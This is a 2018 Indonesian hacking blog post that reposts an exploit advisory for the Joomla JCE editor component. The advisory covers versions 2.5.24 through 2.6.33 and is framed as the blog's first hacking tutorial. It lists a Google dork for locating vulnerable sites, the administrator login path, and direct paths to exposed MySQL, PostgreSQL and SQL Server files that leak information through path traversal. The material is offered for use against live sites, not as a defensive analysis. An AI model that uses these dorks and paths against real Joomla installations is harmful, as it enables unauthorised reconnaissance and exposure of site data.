Wednesday, December 19, 2018

Joomla Exploiter

Ok Ini Artikel Pertama Saya,  GXTFORTEX BLOG<
Saya Kali Ini Akan Membahas Tentang Exploiter
Yaitu Exploiter Joomla Nah Langsung Aja Tanpa Basa Basi Gan

#################################################################################################

# Exploit Title : Joomla Content Editor Com_JCE Components 2.5.24 Database Backup Disclosure Information Vulnerability
# Author [ Discovered By ] :KingSkrupellos
# Date : 02/12/2018
# Vendor Homepage : joomlacontenteditor.net
# Software Download Links : joomlacontenteditor.net/downloads/
+ github.com/joomla/volunteers.joomla.org/tree/master/www/administrator/components/com_jce/sql
+ gitlab.dev.playkey.net/realzkh/realzkh_legacy/tree/master/administrator/components/com_jce/sql
+ JCE 2.6.33 => joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=1353&element=
f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=9ee3309d5768681d0360490d647c2266
+ JCE 2.5.24 => joomlacontenteditor.net/news/jce-2524-released
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.6.33 ~ 2.5.24
# Google Dorks : inurl:''/index.php?option=com_jce''
Index of /administrator/components/com_jce/sql/
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path : 

/administrator/

# Exploit : 

/administrator/components/com_jce/sql/mysql.sql

/administrator/components/com_jce/sql/postgresql.sql

/administrator/components/com_jce/sql/sqlsrv.sql

#################################################################################################


Ok Sekian Dan Terima Kasih Udah Kunjungi Blog Saya Akan Update 2 Hari Sekali Tentang Tutor Tutor Seputar Dunia Hacking Dan Pemrograman 

See You Again Pembaca Setia GXTFORTEX Blog
Saya Tn.GXTFORTEX  mengucapkan Terima Kasih Sekali lagi

OFFICIAL Team KubuCy Team
Posted by at

3 comments:

Subscribe to: Post Comments (Atom)